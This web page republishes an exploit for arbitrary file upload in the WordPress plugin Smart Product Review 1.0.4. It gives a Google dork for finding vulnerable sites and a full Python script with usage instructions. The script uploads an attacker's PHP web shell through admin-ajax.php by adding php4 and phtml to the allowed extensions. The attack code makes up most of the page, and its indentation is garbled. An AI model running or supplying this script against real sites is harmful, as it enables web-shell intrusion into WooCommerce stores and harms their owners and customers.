Home Bug & Exploit Smart Product Review 1.0.4 Arbitrary File Upload on WordPress

Smart Product Review 1.0.4 Arbitrary File Upload on WordPress

312
0

Smart Product Review is an All in One review pack for your WooCommerce store. It lets you add customers’ reviews and ratings with images and videos with ajax review submission and pagination. There are three different layouts (Grid, List, and Slider) available in the plugin.

Exploit Title: WordPress Plugin Smart Product Review 1.0.4 – Arbitrary File Upload
Google Dork: inurl: /wp-content/plugins/smart-product-review/
Date: 16/11/2021
Exploit Author: Keyvan Hardani
Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
Version: <= 1.0.4
Tested on: Kali Linux

import os.path
from os import path
import json
import requests;
import time
import sys
def banner():
animation = "|/-\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")
def usage():
print("Usage: python3 exploit.py [target url] [your shell]")
print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")
def vuln_check(uri): response = requests.get(uri)
raw = response.text
if ("No script kiddies please!!" in raw):
return False;
else:
return True;
def main():
banner()
if(len(sys.argv) != 3):
usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'sprw_file_upload_action'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("() Target not vulnerable!"); sys.exit(1) if( path.isfile(file_path) == False): print("() Invalid file!")
sys.exit(1)
files = {'files[]' : open(file_path)}
data = {
"allowedExtensions[0]" : "jpg",
"allowedExtensions[1]" : "php4",
"allowedExtensions[2]" : "phtml",
"allowedExtensions[3]" : "png",
"qqfile" : "files",
"element_id" : "6837",
"sizeLimit" : "12000000",
"file_uploader_nonce" : "2b102311b7"
}
print("Uploading Shell…");
response = requests.post(uri, files=files, data=data )
file_name = path.basename(file_path)
if("ok" in response.text):
print("Shell Uploaded!")
print("Shell URL on your Review/Comment");
else:
print("Shell Upload Failed")
sys.exit(1)
main();

With the passage of time this error may have been fixed by the developer.

TOP 3 Website to track WordPress hacking alert

WordPress is an open source application that is very popularly used as a blog engine. WordPress is built with the Read more

Unauthenticated Admin Account Creation in WordPress MasterStudy LMS 2.7.5

WordPress (WP, WordPress.org) is a free and open-source content management system (CMS) written in PHP[4] and paired with a MySQL Read more

Previous article‘WP_Query’ SQL Injection on WordPress Core 5.8.2
Next articleUnauthenticated Admin Account Creation in WordPress MasterStudy LMS 2.7.5

LEAVE A REPLY

Please enter your comment!
Please enter your name here